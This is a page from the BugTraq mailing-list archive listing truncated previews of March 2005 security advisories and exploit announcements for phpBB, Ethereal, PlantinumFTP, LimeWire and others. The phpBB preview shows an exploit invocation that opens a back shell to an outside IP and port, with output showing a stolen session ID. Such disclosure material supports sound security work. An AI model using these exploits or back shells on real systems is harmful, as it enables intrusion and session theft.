BugTraq Mode:
(Page 1362 of 1748)  < Prev  1357 1358 1359 1360 1361 1362 1363 1364 1365 1366 1367  Next >
[ISR] - Novell iChain Mini FTP Server Valid User Disclosure Vulnerability 2005-03-15
Francisco Amato (famato infobyte com ar)
||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 03.15.2005
||

.:: SUMMARY

Novell iChain Mini FTP Server Valid User Disclosure Vulnerability
Version: IChain Version v2.3, It is suspected that all previous versions of
IChan
are vulnerable.

.:: BACKGROUND

The Novell iChain prod

[ more ]  [ reply ]
Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access 2005-03-15
Virginity Security (advisory05 konfiweb de)


- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-002
- - - --------------------------------------------------------------------
DATE : 2005-03-13 15:11 GMT
TYPE : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http:

[ more ]  [ reply ]
Few remote bugs in zPanel 2005-03-15
Mik- (misha dom no)
Hello,

Few bugs have been discovered (accidently) in zPanel.
Developers were notified on 07.March but I have not received any
response.

Best regards, Mikhail.
-------------------------------------------------------------

[Product Description]
"ZPanel is a hosting control interface developed f

[ more ]  [ reply ]
SAV9 Functionality Hole - misses virus files 2005-03-15
me3 neuralfibre com


Product: Symantec AntiVirus Corporate Edition 9.0

Vulnerability: Files saved on the server but opened remotely via SMB are not scanned.

SAV9 runs as a client - server application. The client receives updates, the server pushes them out. This has no bearing on the platforms on which they run, nor

[ more ]  [ reply ]
phpbb <= 2.0.12 uid vuln + admin_styles.php php code injection exploit 2005-03-15
bad boy (slythers gmail com)


phpbbexp.exe http://site.com/phpbb/ [backshell ip] [backshell port]
coded by Malloc(0) Wicked Attitude

tested on phpbb 2.0.11
C:\dtc>phpbbexp.exe http://site.com/phpbb2/ 13.37.13.37 8888
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperÚ ... 06bef5092f9d369f13107684f63a3499 http://site

[ more ]  [ reply ]
Unfiltered escape sequences in filenames contained in ZIP archives wouldn't be escaped on displaying or logging, and can also lead to bypass AV scanning 2005-03-14
Dr. Peter Bieringer (pbieringer aerasec de)
Hello,

during investigation of Sober.l we got the idea to replace the spaces of a
filename contained in the ZIP archive by some escape sequences.

Many AV software is logging such filenames during decompressing, so after
creating such regular ZIP archive (by using Perl Archive::Zip module, no
ot

[ more ]  [ reply ]
phpbb cookie admin access 2005-03-14
pureone (pureone36 gmail com)
--------------------------------------------------------------------
Written by pureone (at) spywire (dot) net [email concealed]
--------------------------------------------------------------------
--------------------------------------------------------------------
Exploit : 2.0.x >= phpbb 2.0.12 :
----------------------------

[ more ]  [ reply ]
RE: Av issues 2005-03-14
David Webster (dwebster wittig com) (1 replies)
Symantec Corporate AV client v 9.0.3.1000 with virus defs 3/9/2005 rev.
32 detected ICAR test string in the zip file listed in the poc url.

-----Original Message-----
From: Bipin Gautam [mailto:visitbipin (at) hotmail (dot) com [email concealed]]
Sent: Saturday, March 12, 2005 4:40 AM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Av

[ more ]  [ reply ]
Re: Av issues 2005-03-14
Thierry Zoller (Thierry sniff-em com)
iDEFENSE Security Advisory 03.14.05: MySQL MaxDB Web Agent Multiple Denial of Service Vulnerabilities 2005-03-14
iDEFENSE Labs (labs-no-reply idefense com)
MySQL MaxDB Web Agent Multiple Denial of Service Vulnerabilities

iDEFENSE Security Advisory 03.14.05
www.idefense.com/application/poi/display?id=218&type=vulnerabilities
March 14, 2005

I. BACKGROUND

MaxDB by MySQL is a re-branded and enhanced version of SAP DB, SAP AG's
open source database. MaxD

[ more ]  [ reply ]
DMA[2005-0310a] - 'Frank McIngvale LuxMan buffer overflow' 2005-03-14
Kevin Finisterre (kf digitalmunition com)
I am sure there are some typos in this ... but oh well. By now you all
know I am lazy.
-KF

[ more ]  [ reply ]
Not SQL injection and XSS in paFileDB? 2005-03-12
saudi linux (ksa2ksa yahoo com)
In-Reply-To: <20050312182442.22116.qmail (at) www.securityfocus (dot) com [email concealed]>

>Received: (qmail 27749 invoked from network); 12 Mar 2005 19:45:27 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
> by mail.securityfocus.com with SMTP; 12 Mar 2005 19:45:27 -0000

[ more ]  [ reply ]
3 XSS Vulnerabilities in Phorum <= 5.0.14 2005-03-13
Jon Oberheide (jonojono umich edu)
Author: Jon Oberheide <jon (at) oberheide (dot) org [email concealed]>
Date: Sat, March 12th, 2005

Summary
=======

Application: Phorum
Vendor Website: http://www.phorum.org
Affected Versions: <= 5.0.14
Type of Vulnerability: Cross Site Scripting (XSS)

About Phorum
============

Phorum i

[ more ]  [ reply ]
YaBB2 rc1 XSS 2005-03-13
alireza hassani (trueend5 yahoo com)


[PersianHacker.NET 200503-08] YaBB2 rc1 XSS
Vulnerability
Date: 2005 March
Bug Number: 08
bid:12756

YaBB
is a leading free forum software package that rivals
any professional message board out there. It provides
a real-time chat and support system for your visitors.

More info @:
http://www.

[ more ]  [ reply ]
Ethereal 0.10.9 and below remote root exploit 2005-03-14
Diego Giagio (dgiagio irion com br)
Since Ethereal 0.10.10 has been released a few days ago, I'm publicizing an
exploit for a vulnerability on CDMA A11 dissector that affects version 0.10.9
and below.

Diego Giagio

[ more ]  [ reply ]
...::: hotforum.nl XSS exploit :::... 2005-03-12
Rebyte Security (rebyte walla com)


hotforum.nl XSS exploit
---------------------------
* 13 march 2005
* Discovered by Qon^Rebyte

..:: STATUS ::..
______________________________________________________________________

hotforum.nl has not yet been notified about this explo

[ more ]  [ reply ]
[SECURITYREASON.COM] phpAdsNew 2.0.4-pr1 Multiple vulnerabilities cXIb8O3.9 2005-03-15
Maksymilian Arciemowicz (max jestsuper pl)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpAdsNew 2.0.4-pr1 Multiple vulnerabilities cXIb8O3.9]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 13.3.2005
from securityreason.com TEAM

- --- 0.Description ---
phpAdsNew is an open-source ad server, with an integrated banner management int

[ more ]  [ reply ]
html code include in phpnuke news crash IE 6 2005-03-13
WoRmZ Web (wormz web gmail com) (1 replies)


www.wormzweb.tk

------------------------------------------------------------------------

------------------------------------------------------------------------

ENGLISH
------------------------------------------------------------------------

------------------------------------------------------

[ more ]  [ reply ]
Re: html code include in phpnuke news crash IE 6 2005-03-14
Berend-Jan Wever (skylined edup tudelft nl)
Master RPC program number data base (/etc/rpc) 2005-03-13
Eilon Gishri (eilon aristo tau ac il)
Hi,
After a VERY long time a new version is available.

The latest version of the file can be found at:

ftp://ftp.tau.ac.il/pub/users/eilon/rpc/

Have fun,
Eilon.

--
Eilon Gishri eilon (at) aristo.tau.ac (dot) il [email concealed]
Independent Security Consultant Mobile:+972-54-4303595

[ more ]  [ reply ]
[XSS] paBox 2.0 2005-03-14
Rift (Sean Sage-web com)


pabox 2.0 no longer includes the Date and Time parameters in the POST data sent with your shout. The date and time parameters in previous versions were vulnerable to a cross site scripting attack. Now however in version 2.0 if you setup paBox to include an icon with your topic... eg:

:winkface:

[ more ]  [ reply ]
[ZH2005-02SA] Insecure tmp file creation in Wine 2005-03-14
Giovanni Delvecchio (badpenguin79 hotmail com)


[ZH2005-02SA] Insecure tmp file creation in Wine

03/13/2005

Title: Insecure tmp file creation in Wine

Author: Giovanni Delvecchio
e-mail: badpenguin (at) zone-h (dot) org [email concealed]

Version affected : Wine 20050211 and previous releases

About Wine
========
from http://www.winehq.org/site/docs/wine-faq/index :

[ more ]  [ reply ]
SimpGB SQL Injection Vulnerability 2005-03-13
Alexander Müller (visus portsonline net)
Hi,

The PHP guestbook SimpGB [1], written by Boesch IT-Consulting [2] can be
exploited to gain
userdata. The quote variable isn't checked carefully in
simpgb/include/gb_new.inc called
by guestbook.php.
I wrote a proof of concept which shows a md5 hash and the username, read
from the database.

s

[ more ]  [ reply ]
New Version of WinBlox is Available 2005-03-14
Liu Die Yu (liudieyu umbrella name)


Intro
=====
User-mode WINAPI-level and open-source tool for controlling the behavior of applications running on Windows workstations

http://umbrella.name/upid/winblox

Tech
====
* system-wide dll injection by CreateRemoteThread and intercepting CreateProcessInternalW of kernel32.dll;
* use detour

[ more ]  [ reply ]
LimeWire Gnutella client two vulnerabilities 2005-03-15
Kevin Walsh (kwalsh cs cornell edu)


Summary:
Recent versions of the LimeWire client contain vulnerabilities that allow a remote user access to many or all files on a users machine. LimeWire is a popular client for the Gnutella filesharing network.

Vulnerability 1 - Inappropriate Handling of "resource get" requests.

Symptom:A remo

[ more ]  [ reply ]
[SECURITY] [DSA 693-1] New luxman packages fix local root exploit 2005-03-14
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 693-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
March 14, 2005

[ more ]  [ reply ]
[HAT-SQUAD] SafeNet Sentinel LM, UDP License Manager Exploit 2005-03-13
class 101 (class101 hat-squad com)
Application overview:
Sentinel LM is a software-based license management application
allowing application developers to implement multiple pre-built license
models with a single software development integration effort. Developers can
sell or deliver multiple license types simply by chang

[ more ]  [ reply ]
PlantinumFTP server <= 1.0.18 Remote DOS exploit 2005-03-14
Exoduks (exoduks gmail com) (1 replies)


Here is simple exploit for PlantinumFTP server DOS bug.

/*
* PlantinumFTP server <= 1.0.18 Remote DOS exploit
* -------------------------------------------------
* PlantinumFTP server exploit for Remote Denial of Service bug
* in PlantinumFTP founded by ports.
*
* Coded by Exoduks - exoduks

[ more ]  [ reply ]
Re: PlantinumFTP server <= 1.0.18 Remote DOS exploit 2005-03-15
Gary H. Jones II (gary pointblanksecurity com)
"Drop to STARTUP Folder II" published on 2005/02/08 2005-03-14
Liu Die Yu (liudieyu umbrella name)


Michael Krax and Andreas Sandblad found "Drop to STARTUP Folder II" which has been patched for several weeks.
It's a shame that neither provided code.

So here we go:
http://umbrella.name/computer/0daymon/

0daymon also collected the original posts by bug finders for reference.

[ more ]  [ reply ]
(Page 1362 of 1748)  < Prev  1357 1358 1359 1360 1361 1362 1363 1364 1365 1366 1367  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus